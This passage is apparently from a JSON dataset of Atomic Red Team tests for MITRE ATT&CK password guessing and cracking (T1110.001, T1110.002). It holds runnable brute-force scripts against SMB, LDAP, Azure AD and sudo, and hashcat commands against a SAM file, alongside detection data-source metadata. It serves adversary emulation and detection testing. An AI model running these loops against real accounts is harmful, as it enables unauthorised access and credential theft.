passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%username%\" \"%p\" 1>NUL 2>&1 && @echo [*] %username%:%p && @net use /delete %logonserver%\\IPC$ > NUL\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 
1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"$ENV:USERNAME\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account $ENV:USERNAME.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] $ENV:USERNAME:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path PathToAtomicsFolder\\T1110.001\\src\\passwords.txt\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
#{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
#{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "Import-Module -Name AzureAD\n\n$passwords = \"#{passwords}\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "Import-Module -Name AzureAD\n\n$passwords = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account #{username}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{username}:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] #{username}:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n" + ], + "commands": [ + { + "command": "echo Password1> 
passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%username%\" \"%p\" 1>NUL 2>&1 && @echo [*] %username%:%p && @net use /delete %logonserver%\\IPC$ > NUL\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"$ENV:USERNAME\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account $ENV:USERNAME.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
$ENV:USERNAME:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path PathToAtomicsFolder\\T1110.001\\src\\passwords.txt\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
#{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
#{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path #{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
#{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "Import-Module -Name AzureAD\n\n$passwords = \"#{passwords}\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "Import-Module -Name AzureAD\n\n$passwords = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account #{username}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] 
#{username}:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] #{username}:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + }, + { + "command": "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "source": "atomics/T1110.001/T1110.001.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Guessing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.001", + "display_name": "Brute Force: Password Guessing", + "atomic_tests": [ + { + "name": "Brute Force Credentials of single Active Directory domain users via SMB", + "auto_generated_guid": "09480053-2f98-4854-be6e-71ae5f672224", + "description": "Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller\n", + "supported_platforms": [ + "windows" + ], + 
"input_arguments": { + "user": { + "description": "Account to bruteforce", + "type": "String", + "default": "%username%" + } + }, + "executor": { + "name": "command_prompt", + "command": "echo Password1> passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\#{user}\" \"%p\" 1>NUL 2>&1 && @echo [*] #{user}:%p && @net use /delete %logonserver%\\IPC$ > NUL\n" + } + }, + { + "name": "Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)", + "auto_generated_guid": "c2969434-672b-4ec8-8df0-bbb91f40e250", + "description": "Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user": { + "description": "Account to bruteforce", + "type": "String", + "default": "$ENV:USERNAME" + }, + "passwords_path": { + "description": "List of passwords we will attempt to brute force with", + "type": "Path", + "default": "PathToAtomicsFolder\\T1110.001\\src\\passwords.txt" + }, + "domain": { + "description": "Active Directory domain FQDN", + "type": "String", + "default": "$env:UserDnsDomain" + }, + "auth": { + "description": "authentication method to choose between \"NTLM\" and \"Kerberos\"", + "type": "String", + "default": "NTLM" + } + }, + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "if (\"#{auth}\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"#{domain}\",389)\n\n$passwordList = Get-Content -Path 
#{passwords_path}\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"#{user}\", $password, \"#{domain}\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})\n try {\n Write-Host \" [-] Attempting ${password} on account #{user}.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{user}:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n" + } + }, + { + "name": "Brute Force Credentials of single Azure AD user", + "auto_generated_guid": "5a51ef57-299e-4d62-8e11-2d440df55e69", + "description": "Attempt to brute force Azure AD user via AzureAD powershell module.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg \"bruce.wayne@\"", + "type": "String", + "default": "bruce.wayne@contoso.com" + }, + "passwords": { + "description": "List of passwords we will attempt to brute force with", + "type": "String", + "default": "Password1`n1q2w3e4r`nPassword!" 
+ } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Import-Module -Name AzureAD\n\n$passwords = \"#{passwords}\".split(\"{`n}\")\nforeach($password in $passwords) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account #{username}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] #{username}:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] #{username}:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n" + } + }, + { + "name": "SUDO brute force Debian", + "auto_generated_guid": "464b63e8-bf1f-422e-9e2c-2aa5080b6f9a", + "description": "Brute force the password of a local user account which is a member of the sudo'ers group on a Debian based Linux distribution. 
\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a Debian based machine.\n", + "prereq_command": "if grep -iq \"debian\\|ubuntu\\|kali\" /usr/lib/os-release; then echo \"Debian\"; else echo \"NOT Debian\"; exit 1; fi\nif grep -Rq \"pam_tally\" /etc/pam.d/*; then echo \"pam_tally configured\"; exit 1; fi\nif [ -x \"$(command -v sudo)\" ]; then echo \"sudo installed\"; else echo \"install sudo\"; fi\nif [ -x \"$(command -v openssl)\" ]; then echo \"openssl installed\"; else echo \"install openssl\"; fi\n", + "get_prereq_command": "apt-get update && apt-get install -y openssl sudo\n" + } + ], + "executor": { + "elevation_required": true, + "command": "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "cleanup_command": "userdel target\n", + "name": "sh" + } + }, + { + "name": "SUDO brute force Redhat", + "auto_generated_guid": "b72958a7-53e3-4809-9ee1-58f6ecd99ade", + "description": "Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution. 
\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a Redhat based machine.\n", + "prereq_command": "if grep -iq \"rhel\\|fedora\\|centos\" /usr/lib/os-release; then echo \"Redhat\"; else echo \"NOT Redhat\"; exit 1; fi\nif grep -Rq \"pam_faillock\" /etc/pam.d/*; then echo \"pam_faillock configured\"; exit 1; fi\nif [ -x \"$(command -v sudo)\" ]; then echo \"sudo installed\"; else echo \"install sudo\"; fi\nif [ -x \"$(command -v openssl)\" ]; then echo \"openssl installed\"; else echo \"install openssl\"; fi\n", + "get_prereq_command": "yum -y update && yum install -y openssl sudo\n" + } + ], + "executor": { + "elevation_required": true, + "command": "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target\nsu target\n\nPASSWORDS=(one two three password five); \\\n touch /tmp/file; \\\n for P in ${PASSWORDS[@]}; do \\\n date +\"%b %d %T\"; \\\n sudo -k && echo \"$P\" |sudo -S whoami &>/tmp/file; \\\n echo \"exit: $?\"; \\\n if grep -q \"root\" /tmp/file; then \\\n echo \"FOUND: sudo => $P\"; break; \\\n else \\\n echo \"TRIED: $P\"; \\\n fi; \\\n sleep 2; \\\n done; \\\n rm /tmp/file\n", + "cleanup_command": "userdel target\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1110.002", + "command_list": [ + "cd %temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe\\..\n%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", + "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule PathToAtomicsFolder\\T1110.002\\src\\sam.txt #{input_file_passwords}", + "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} PathToAtomicsFolder\\T1110.002\\src\\password.lst" + ], + "commands": [ + { + "command": "cd 
%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe\\..\n%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}", + "source": "atomics/T1110.002/T1110.002.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Cracking" + }, + { + "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule PathToAtomicsFolder\\T1110.002\\src\\sam.txt #{input_file_passwords}", + "source": "atomics/T1110.002/T1110.002.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Cracking" + }, + { + "command": "cd #{hashcat_exe}\\..\n#{hashcat_exe} -a 0 -m 1000 -r .\\rules\\Incisive-leetspeak.rule #{input_file_sam} PathToAtomicsFolder\\T1110.002\\src\\password.lst", + "source": "atomics/T1110.002/T1110.002.yaml", + "name": "Atomic Red Team Test - Brute Force: Password Cracking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.002", + "display_name": "Brute Force: Password Cracking", + "atomic_tests": [ + { + "name": "Password Cracking with Hashcat", + "auto_generated_guid": "6d27df5d-69d4-4c91-bc33-5983ffe91692", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "hashcat_exe": { + "description": "Path to Hashcat executable", + "type": "String", + "default": "%temp%\\hashcat6\\hashcat-6.1.1\\hashcat.exe" + }, + "input_file_sam": { + "description": "Path to SAM file", + "type": "String", + "default": "PathToAtomicsFolder\\T1110.002\\src\\sam.txt" + }, + "input_file_passwords": { + "description": "Path to password list", + "type": "String", + "default": "PathToAtomicsFolder\\T1110.002\\src\\password.lst" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Hashcat must exist on disk at specified location (#{hashcat_exe})", + "prereq_command": "if (Test-Path $(cmd /c 
